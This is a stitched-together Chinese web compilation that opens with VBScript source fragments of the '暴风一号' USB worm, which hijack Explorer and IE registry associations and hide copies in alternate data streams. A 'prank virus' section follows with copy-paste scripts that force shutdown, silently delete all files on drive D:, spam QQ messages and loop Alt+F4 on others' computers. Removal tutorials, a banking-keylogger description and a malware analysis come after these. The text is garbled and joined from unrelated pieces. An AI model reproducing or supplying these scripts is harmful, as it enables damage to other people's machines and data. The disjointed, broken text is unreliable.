SubSubSetIEAss(sFilePath)'篡改IE启动设置On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE " CallWriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.e xe\shell\open\command\", Value, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B3030 9D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath)'改变我的电脑的打开关联，包括Win+EOn Error Resume NextDim Value1,Value2Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\", "", "REG_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\open\command\", Value1, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv)'获取驱动器序列号的绝对值On Error Resume NextSet d=fso.GetDrive(Drv)GetSerialNumber=d.SerialNumber'返回十进制序列号，用于唯一标识一个磁盘卷GetSerialNumber=Replace(GetSerialNumber,"-","")'去掉负号End FunctionFunction GetMainVirus(N)'根据N的值获取不同的字符串On Error Resume NextMainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"'以驱动器的序列号绝对值为vbs病毒的名字If GetFileSystemType(GetSystemDrive())="NTFS" Then'系统盘是NTFS分区If N=1 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName'返回"c:\windows\system32\smss.exe:72161642.vbs"End IfIf N=0 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName'返回"c:\windows\explorer.exe:72161642.vbs"End IfElse'系统盘是FAT32分区GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName'返回"c:\windows\72161642.vbs"或者"c:\windows\system32\72161642.vbs"End IfEnd FunctionFunction VBSProcessCount(VBSPath)'返回指定路径vbs脚本的运行个数On Error Resume NextDim WMIService, ProcessList, ProcessVBSProcessCount=0Set WMIService=GetObject("winmgmts:\\.\root\cimv2")Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessListIf InStr(mandLine, VBSPath)>0 ThenVBSProcessCount=VBSProcessCount+1End IfNextEnd FunctionFunction PreDblInstance()'用来计数wscript进程的个数，如果大于等于3个那么返回TrueOn Error Resume NextPreDblInstance=FalseIf VBSProcessCount(WScript.ScriptFullName)>= 3 ThenPreDblInstance=TrueEnd IfEnd FunctionFunction GetTargetPath(LnkPath)'获取快捷方式的vbs脚本地址On Error Resume NextDim ShortcutSet Shortcut=WshShell.CreateShortcut(LnkPath)GetTargetPath=Shortcut.TargetPathEnd FunctionFunction GetCode(FullPath)'获取文件的所有代码On Error Resume NextDim FileTextSet FileText=FSO.OpenTextFile(FullPath, 1)GetCode=FileText.ReadAllFileText.CloseEnd FunctionFunction GetVersion()'获取windows版本Dim VerInfoVerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"If ReadReg(VerInfo)="" ThenGetVersion=0ElseGetVersion=CInt(ReadReg(VerInfo))End IfEnd FunctionSub VirusAlert()'创建一个BFAlert.hta，然后打开该网页，黑黑的，什么都没有，吓人的On Error Resume NextDim HtaPath,HtaCodeHtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize""border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no""selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<fontstyle=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR >"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号</font>"&VBCRLF&"</DIV></BODY></HTML>"If FSO.FileExists(HtaPath)=False ThenCall CreateFile(HtaCode, HtaPath)Call SetHiddenAttr(HtaPath)End IfCall Run(HtaPath)End SubFunction GetInfectedDate()'获取感染日期On Error Resume NextDim DateInfoDateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"If ReadReg(DateInfo)="" ThenGetInfectedDate=""ElseGetInfectedDate=CDate(ReadReg(DateInfo))End IfEnd FunctionSub MakeJoke(Times)'恶搞，弹出光驱On Error Resume NextDim WMP, colCDROMsSet WMP = CreateObject( "WMPlayer.OCX" )Set colCDROMs = WMP.cdromCollectionIf colCDROMs.Count>0 ThenFor i=1 to TimescolCDROMs.Item(0).eject()WScript.Sleep 3000colCDROMs.Item(0).eject()NextEnd IfSet WMP = NothingEnd Sub。

整⼈病毒vbs⼤全！新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下：On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上，好多⼈都那它没办法，哈哈—————————————————————————代码如下：domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下：while(1)msgbox “哈哈你被耍了！“loop—————————————————————————6、不断按下alt+f4 （开什么都关闭……）病毒太强必须关机才⾏！—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。

Win7环境下彻底清除VBS病毒的教程 说起VBS病毒，可能很多⽤户并不了解，但说起1kb快捷⽅式病毒，⽤户⼀定有所⽿闻，甚⾄亲⾝经历，这种1KB快捷⽅式病毒有⼀个名称叫：暴风⼀号。

TA可以通过U盘、MP4/MP5之类的可移动存储设备传播的，可能对移动设备没有什么太⼤的影响，但若是该移动设备插进计算机，那杀伤⼒还是很⼤的。

如何在Win7环境下彻底清除VBS病毒？⼩⾯⼩编就为⼤家带来Win7环境下彻底清除VBS病毒的教程。

⼀起去看看吧！ VBS病毒的能做什么？ 在显⽰隐藏⽂件和扩展名的情况下，U盘和我的电脑各盘符下多了⽂件Autorun.inf和*.VBS（名字为8位数字的VBS⽂件）根⽂件夹下的所有⽂件夹都变成了两份，⼀份是隐藏⽅式，另⼀份其实是快捷⽅式。

有时系统的显⽰隐藏⽂件都会失效，⽆法完全显⽰病毒⽂件（但是可以通过winrar的⽂件浏览看到），如果不能完全查杀的话，杀毒之后留下后遗症，也就是我的电脑⽆法打开、磁盘⽆法打开、只能⽤任务管理器。

有些⽤户说“我的电脑”打不开了，就是这个原因。

如何对付VBS病毒？ 1、⾸先点开始菜单，然后点“运⾏”；没有运⾏指令的话，直接按键盘上的开始按键+ E； 2、然后输⼊：reg add HKCR\batfile\shell\open\command /ve /d "\"%1\" %*" /f 3、怕输错的直接复制粘贴过去也⼀样； 4、然后在桌⾯上新建⼀个⽂本⽂档，之后复制粘贴以下内容：@echo offmode con cols=53 lines=30echo.echo U盘病毒*.VBS专杀echo.echo 正在杀毒，请稍候。

echo.start /min taskkill /im explorer.exe /fstart /min taskkill /im wscript.exe /fif exist %systemRoot%\*.vbs del /a /q /f %systemRoot%\*.vbs & echo 发现VBS病毒！if exist %systemRoot%\system32\*.vbs del /a /q /f %systemRoot%\system32\*.vbsecho 执⾏清理中。

貌似有点像1KB快捷方式的病毒，请不要删除文件夹，真实的文件已被隐藏，这个病毒软件用杀毒软件无法清除，有一个专杀工具，…1KB快捷方式病毒专杀工具从网上搜索“文件夹变成1k快捷方式”，得到很多网友的解决方法，现整理如下，希望对各位有所帮助。

方法一：1、光盘启动，格式化所有盘，重装系统。

2、关闭所有驱动器的自动运行功能，这步非常重要，如果不会，百度一下吧。

3、到这个网站：/zhuansha/kill_folder.html 下载这个专杀工具可恢复所有被隐藏的内容。

方法二：1、重装系统，不动除C盘外的其它盘。

完成后不要做任何其它操作。

（如果C盘、桌面有重要文件，请先备份）2、关闭所有驱动器的自动运行功能，这步非常重要，如果不会，百度一下吧。

3、显示出所有系统文件(不会的朋友先百度下)，用点击右键打开的方法，打开其它盘，就能看到快捷方式和病毒，这些可以全部删掉。

(千万不要因为好奇或失误双击啊，不然系统就白装了)4、到这个网站：/zhuansha/kill_folder.html 下载这个专杀工具可恢复所有被隐藏的内容。

经多台电脑使用，证明此法简单可行。

方法三：不用重装系统也能彻底清除此病毒的方法，操作比较专业。

是windows PE下把所有vbs结尾的文件都删掉包括所有显示的快捷方式，病毒的问题就可以解决了！！很管用的，大家遇到这种情况可以试试！用光盘进winpe（如果硬盘上装有winpe则开机时选择进入winpe即可），搜索*.vbs（*表示任意文件名），将搜索出来的结果全部删除。

其实，这病毒是这样运行的。

通过AutoRun.inf指向*********.vbs这个脚本文件，来自动运行病毒，感染全部磁盘根目录，这些目录变成快捷方式，再指向那个vbs文件，以后要预防这种病毒就是要禁用系统的自动运行功能。

此毒中招后的一个显著特征是：硬盘各个分区原有的正常文件夹被隐藏，代之以1KB的同名文件夹.lnk文件。

怎么清除1kb病毒中毒现象:磁盘根目录文件夹会变成快捷方式，打开会显示脚本错误等。

方法:1、全盘格式化，再重装系统。

(这个方法最直接，不过会丢失所有数据。

)2、使用“1KB文件夹快捷方式病毒清除专用”工具。

(这种方法最好，强烈推荐，简单快捷)首先使用“自动化清除脚本程序”清除系统内此病毒。

如果“自动化清除脚本程序”清除无效。

请使用“清理工具”清理系统，并重启电脑即可。

然后用“恢复文件夹属性工具”恢复被隐藏的各盘文件夹。

3、手动杀毒:(这种方法好玩，喜欢弄电脑的不如去试下) ,进PE，删除C:\盘至Z:\盘的根目录下的Autorun.inf文件删除C:\盘至Z:\盘的根目录下的*.vbs文件删除C:\盘至Z:\盘的根目录下的*.lnk文件,然后重装系统,用记事本编辑以下数据，后缀改成bat@echo off>nulsetlocal enabledelayedexpansion>nultitle 修改系统属性和隐藏属性>nulcolor f0mode con: cols=41 lines=25>nul cls>nulECHO ================================ECHO 请选择要进行的操作，然后按回车ECHO ————————————————echo 加系统和隐藏属性 (1)echo.echo 减系统和隐藏属性 (2)echo.echo 退出 (3)echo.set /p UserSelection=选择 ( 1 , 2 )set b=%~1>nulif "!b:~1!"=="\" set b=!b:~0,-1!>nul if "%UserSelection%"=="1" ( attrib -s -h "!b!">nulattrib +s +h "!b!">nulattrib /s /d -s -h "!b!\*">nul attrib /s /d +s +h "!b!\*">nul ) if "%UserSelection%"=="2" ( attrib -s -h "!b!" >nulattrib /s /d -s -h "!b!\*">nul )pause>nulexit把那些隐藏的文件拖入该文件中可恢复其系统隐藏属性.。

新手也能对付病毒：清除svch0st.exe病毒防范-电脑资料svch0st.exe和系统进程svchost.exe只差一个字符，注意svch0st.exe中的0这个是数字零，而系统进程svchost.exe中的o是字母O，。

该病毒运行后在系统文件夹%System%下创建自身的副本，文件名为svch0st.exe。

（其中，%System%在Windows 95/98/Me 下为C:\\Windows\\System，在Windows NT/2000下为C:\\Winnt\\System32，在Windows XP下为C:\\Windows\\System32）随后病毒修改注册表，以达到随系统启动而自动运行的目的，在HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\ Current Version\\Run下创建："svch0st.exe" = "%System%\\svch0st.exe""taskmgr.exe" = "%System%\\svch0st.exe"病毒运行后检查IE窗口标题栏，判定当前窗口是否为网上银行的登陆页面，涉及到国内多家银行的网上交易系统，电脑资料《新手也能对付病毒：清除svch0st.exe病毒防范》(https://www.)。

一旦发现当前IE窗口为上述银行的登陆页面，病毒立即开始记录键盘输入的所有键值，记录的键值几乎包括了所有可能的键盘录入。

窃取的用户信息包括网上银行的帐号、密码、验证码等。

当病毒截获被感染计算机所输入的键盘值后，将其窃取到的信息发送到指定的地址。

清除方法：关闭系统还原，开始－运行：msconfig （运行系统配置程序）。

在启动项中取消"svch0st.exe" = "%System%\\svch0st.exe"和"taskmgr.exe" = "%System%\\svch0st.exe" 两项前面的勾。

VBS.Runauto脚本病毒是我们俗称的U盘病毒的一种，Symantec公司给其定位为蠕虫（Worm）病毒，虽然危害性远不如一些恶性病毒，但常常会严重影响用户正常使用计算机。

最近一位同事的笔记本遭遇了这个病毒，正好这学期在给计算机专业的同学们上VBscript 于是顺便分析了一下。

首先从染病毒的计算机上提取下来病毒样本，由于是临时发现的，也没有特别准备，就用winrar压缩后保存。

在实验机器上打开病毒样本的压缩文件，我的Symantec 11立即报警，并把病毒删除了。

所以必须禁用杀毒软件或者设置一个“例外区域”用于分析病毒，于是在桌面上新建了“evA”文件夹，并将之设置为防病毒例外文件夹，这下病毒样本安静的躺在里面了。

脚本病毒是解释型程序，因此我们不需要什么特别的反编译工具就能查看源代码了。

虽然Windows的记事本足够用了，但是我还是喜欢使用UltraEdit。

使用打开UltraEdit打开病毒文件如图1，注意，为了防止误触发病毒，这里首先将vbs扩展名修改为txt。

图1 病毒脚本打开病毒脚本，大家可以发现代码的可读性非常差，大小写字母杂乱的排列，并且还有很多无法理解的符号串。

其实这是病毒为了保存自己而“想”出来的“保护伞”。

病毒代码大小写问题可以在UE（以后UltraEdit简称）中选择文本后，使用Ctrl+F5直接转换成小写字母。

对于类似密码的“00c2%0033%……”的字符串相对来说比较麻烦点。

从病毒代码中可以发现只要出现“乱码”的地方都会有“STrREVeRSE”和“unEscaPE”函数的调用，其中“unescape”是vbscript标准函数，作用就是将经过escape函数编码过的字符串进行反编码。

这里需要说明一下，由于Web中的Html对于有些符号是进行保留使用的，比如“<”和“>”符号，如果需要对这些符号进行显示那么需要对他们进行html编码，所有空格、标点、重音符号以及其他非ASCII 字符都用%xx 编码代替，其中xx 等于表示该字符的十六进制数。

清除autorun.inf的批处理和vbs方法教程电脑病毒看不见，却无处不在，有时防护措施不够或者不当操作都会导致病毒入侵。

那么怎么清除autorun.inf的批处理和vbs，下面一起看看具体步骤!方法步骤kill.bat复制代码代码如下:@echo offtaskkill /f /im 病毒.execd\for /d %%i in (C,d,,e,f,g,h,I,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do attrib -s -a -r -h %%i:\autorun.inf&attrib -s -a -r -h %%i:\病毒.exe& del %%i:\病毒.exe&del %%i:\autorun.infkill.vbs复制代码代码如下:ON ERROR RESUME NEXTciker_path = InputBox("本程序能帮助您清除autorun.inf病毒。

"&vbCr&vbCr&"请在下面输入autorun.inf所在的目录："&vbCr&vbCr&"By Ciker 08.03.30","AutoRun.inf清除","C:\autorun.inf")ciker_exe = InputBox("请在下面输入exe病毒文件所在的目录："&vbCr&vbCr&"By Ciker 08.03.30","AutoRun.inf清除","C:\target.exe")Set Fso=CreateObject("Scripting.FileSystemObject")Set fl0=Fso.getfile(ciker_path)Set fl1=Fso.getfile(ciker_exe)fl0.deletefl1.deletemsgbox "清除成功!"wscript.quit免疫.bat复制代码代码如下:setacl.exeCURRENT_USER\Software\Microsoft\Windows\CurrentVersion\E xplorer\MountPoints2 /registry /deny everyone /full相关阅读：2018网络安全事件：一、英特尔处理器曝“Meltdown”和“Spectre漏洞”2018年1月，英特尔处理器中曝“Meltdown”(熔断)和“Spectre” (幽灵)两大新型漏洞，包括AMD、ARM、英特尔系统和处理器在内，几乎近20年发售的所有设备都受到影响，受影响的设备包括手机、电脑、服务器以及云计算产品。

如何快速清理掉电脑病毒快速清理电脑病毒防范介绍：快速清理电脑病毒方法一：建议先查杀一下木马，修复一下系统试试。

建议你下载恶意软件和木马强杀工具windows清理助手查杀恶意软件和木马：下载安装后，首先升级到最新版本，然后退出正常模式并重启按F8进入到安全模式。

打开软件，点击“系统扫描”，对扫描结果全选，然后点击“执行清理”按钮，如果软件提示你是否“备份”，选择“是”备份是为了防止发生清理错误，如果清理后系统没有发生异常，就删除备份，按提示进行操作即可软件也可以在正常模式中进行查杀。

1、开机按F8不动到高级选项出现在松手，选“最近一次的正确配置”回车修复。

2、开机按F8进入安全模式后在退出，选重启或关机在开机，就可以进入正常模式修复注册表。

3、如果故障依旧，请你用系统自带的系统还原，还原到你没有出现这次故障的时候修复或用还原软件进行系统还原。

4、如果故障依旧，使用系统盘修复，打开命令提示符输入SFC /SCANNOW 回车SFC和/之间有一个空格，插入原装系统盘修复系统，系统会自动对比修复的。

5、如果故障依旧，在BIOS中设置光驱为第一启动设备插入原装系统安装盘按R键选择“修复安装”即可。

6、如果故障依旧，建议重装操作系统。

快速清理电脑病毒方法二：360安全卫士，卡卡上网安全助手。

瑞星杀毒，360保险箱，等。

这些怎么够呢……如果你真的中毒的话杀毒软件不是万能的当你确定是病毒后，应该断网查杀，推荐你几款:Windows清理助手 AVG木马清道夫这个的话你让它杀毒要钱，查木马可以免费，但你可以重启计算机开机狂按F8进安全模式，自己手动根据上面显示的路径删除病毒。

最好你杀毒时在安全模式下杀，有的病毒正常模式下查不到的，怎么进安全模式上面写了，就是开机按F8，方向键选择安全模式，按回车就ok另外，你可以先调出任务管理器看看进程，是不是有占用率特别大的，百度一下进程的名字看看是不是病毒什么的。

我以前总是中毒，现在根本不中了，就按了个360和瑞星，备了个Windows清理助手。